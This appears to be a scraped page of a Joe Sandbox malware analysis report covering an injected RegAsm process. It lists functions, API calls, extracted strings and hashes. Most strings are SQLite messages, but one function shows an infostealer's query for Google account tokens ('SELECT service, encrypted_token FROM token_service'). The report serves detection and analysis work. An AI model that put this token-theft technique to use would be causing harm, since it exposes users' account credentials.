                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                                                                                                                                                                • Instruction ID: d4147f8a7127cf494b3314631bdc4fd5b9b32beeab778344905c85bec403dc11
                                                                                                                                                                                                • Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                                                                                                                                                                • Instruction Fuzzy Hash: B651C375A043016BEB00EF14EC81BAFB7E8EF88715F40453DF98497241E739AE5987A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B511940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • block, xrefs: 1B511A90
                                                                                                                                                                                                • misuse, xrefs: 1B511B21
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B511B26
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B511B17
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-4016964285
                                                                                                                                                                                                • Opcode ID: 500e1a90a1e9c42f2d642bf8cd508aed1ec0e418815adfd0eb7f0ffd3bd2b340
                                                                                                                                                                                                • Instruction ID: b3c4a30e156d56651efd8ebcfd679563059808a1497fe97e2a0e14bd7be89a98
                                                                                                                                                                                                • Opcode Fuzzy Hash: 500e1a90a1e9c42f2d642bf8cd508aed1ec0e418815adfd0eb7f0ffd3bd2b340
                                                                                                                                                                                                • Instruction Fuzzy Hash: D1C1D2B1D002119FFB10DF26D884ADA7BA8FF54714F0585A9FC899F201E731D954CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00407F13 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 308stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00407F18
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040813A
                                                                                                                                                                                                  • Part of subcall function 0040FD58: LocalAlloc.KERNEL32(00000040,004120FA,00000001,00000000,?,004120F9,00000000,00000000), ref: 0040FD71
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040815F
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00408249
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040825D
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 004063FD: _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                  • Part of subcall function 004063FD: memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                  • Part of subcall function 004063FD: memset.MSVCRT ref: 00406457
                                                                                                                                                                                                  • Part of subcall function 004063FD: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                • API String ID: 832884763-1713091031
                                                                                                                                                                                                • Opcode ID: d72b6939c06a14bef754848363fa9dafce077152f944b84ac79f95e0184815bb
                                                                                                                                                                                                • Instruction ID: 25686ab6400ac8ecb5d7b03c8e8e1ed9899d309d5e80ea8562dc234810ff2347
                                                                                                                                                                                                • Opcode Fuzzy Hash: d72b6939c06a14bef754848363fa9dafce077152f944b84ac79f95e0184815bb
                                                                                                                                                                                                • Instruction Fuzzy Hash: B3C17E71804248EACB05EBE6D955FEDBBB4AF19308F1044AEF442731C2DF791B18DA25
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BFED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
                                                                                                                                                                                                • API String ID: 0-1539118790
                                                                                                                                                                                                • Opcode ID: 08833c0286972de4f244b6ea21b9700f1a2939116c17ad878366eb01acb12afe
                                                                                                                                                                                                • Instruction ID: c73d62edbc66c866547ad38bd1bab4f33b5fe0e8cebb8b2636ae3a04152bae61
                                                                                                                                                                                                • Opcode Fuzzy Hash: 08833c0286972de4f244b6ea21b9700f1a2939116c17ad878366eb01acb12afe
                                                                                                                                                                                                • Instruction Fuzzy Hash: 77910175A043009BCB049F19DC94BEBB7A1BB8A714F04852DF9899B350D73BE84ACB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5C70B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
                                                                                                                                                                                                • API String ID: 0-165706444
                                                                                                                                                                                                • Opcode ID: 9c23336a50122a9782f515bbbb17ec943573cd5c8130d37c0b7c9da49d8c0176
                                                                                                                                                                                                • Instruction ID: 308719755d87ffb50c5e0d4852b2f846ea79f8776c4b40046fa9bce40df9d192
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c23336a50122a9782f515bbbb17ec943573cd5c8130d37c0b7c9da49d8c0176
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C6146B5A003806BFF218FB0EC81FDB77AEEF91216F144469EC9496642E721E154C3B2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B3A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
                                                                                                                                                                                                • API String ID: 0-1499782803
                                                                                                                                                                                                • Opcode ID: 137b8162fa76cb6918ecb140c27fe4497d10a56bfb2856aba45fd4260253d0cb
                                                                                                                                                                                                • Instruction ID: 002935d8cdfd81e9af8b0b686f0decd75acdea77ae72ad11c568d030d68f4c16
                                                                                                                                                                                                • Opcode Fuzzy Hash: 137b8162fa76cb6918ecb140c27fe4497d10a56bfb2856aba45fd4260253d0cb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 13512B72A082109BDB04CF16DAC6BD677A4AF90254F15C86DFD898B306E736E845C771
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5CB0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                                                                                                                                                • API String ID: 0-538076154
                                                                                                                                                                                                • Opcode ID: 0a97a5e63e243813dc7bf8a2b6428af072308b2d1ff2f0e35d1b0099f6867413
                                                                                                                                                                                                • Instruction ID: 15695934879877dd91a13dce3ee07cc4415ae502446452b0bd502a08d14a07f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a97a5e63e243813dc7bf8a2b6428af072308b2d1ff2f0e35d1b0099f6867413
                                                                                                                                                                                                • Instruction Fuzzy Hash: C8319B7590474CABFB111FE49C007DB7BAF9F85225F000A2DE891E2101E771EA059393
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040D284 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100stringmemoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
                                                                                                                                                                                                • String ID: 0123456789ABCDEF
                                                                                                                                                                                                • API String ID: 1978830238-2554083253
                                                                                                                                                                                                • Opcode ID: 816881ed8d0e230d466643db59f852525868b97dae52142a6d260626a908fec4
                                                                                                                                                                                                • Instruction ID: c5e121148ab2dda4085b2c5b8fcab7a3083e30b94096a511279be86f07c38caa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 816881ed8d0e230d466643db59f852525868b97dae52142a6d260626a908fec4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5931DF72A00215AFDB04DFA9DC85AAF7BA9EF49350B00407AF911EB2D1DA78D905CB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C6F30 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 83COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • out of memory, xrefs: 1B4C6F39, 1B4C6FA0
                                                                                                                                                                                                • misuse, xrefs: 1B4C6F6A
                                                                                                                                                                                                • invalid, xrefs: 1B4C6F4F
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B4C6F54
                                                                                                                                                                                                • bad parameter or other API misuse, xrefs: 1B4C6F7E
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4C6F6F
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4C6F60
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$bad parameter or other API misuse$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$out of memory
                                                                                                                                                                                                • API String ID: 0-2911740470
                                                                                                                                                                                                • Opcode ID: 5cc9b3d774d5523220719ee6c4dd054d42050a1a8f7379c724c1bf2c91ba6578
                                                                                                                                                                                                • Instruction ID: 53351d49602f36ac12e5e12451efbc8c60db41240cb94c6c16295dfd11e46afb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cc9b3d774d5523220719ee6c4dd054d42050a1a8f7379c724c1bf2c91ba6578
                                                                                                                                                                                                • Instruction Fuzzy Hash: 832149BDA0435097DB254B24EC41BD727A36BD4B19F28C52DF4D657301D635F8878392
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B576380 Relevance: 15.1, APIs: 10, Instructions: 110COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b54a5ea55491ca75d754ca7ae4acb4d7df21aefe6965cbd11c614bf193b88763
                                                                                                                                                                                                • Instruction ID: 025a955a8dc3b967cf3a403ecb4249875e92c1a10da4a8f9be991510a7ebe4bc
                                                                                                                                                                                                • Opcode Fuzzy Hash: b54a5ea55491ca75d754ca7ae4acb4d7df21aefe6965cbd11c614bf193b88763
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C4191705006219FDB246F25ECC9B4677BDBFA4269F10482CFCC692611D731F498CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4EF4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
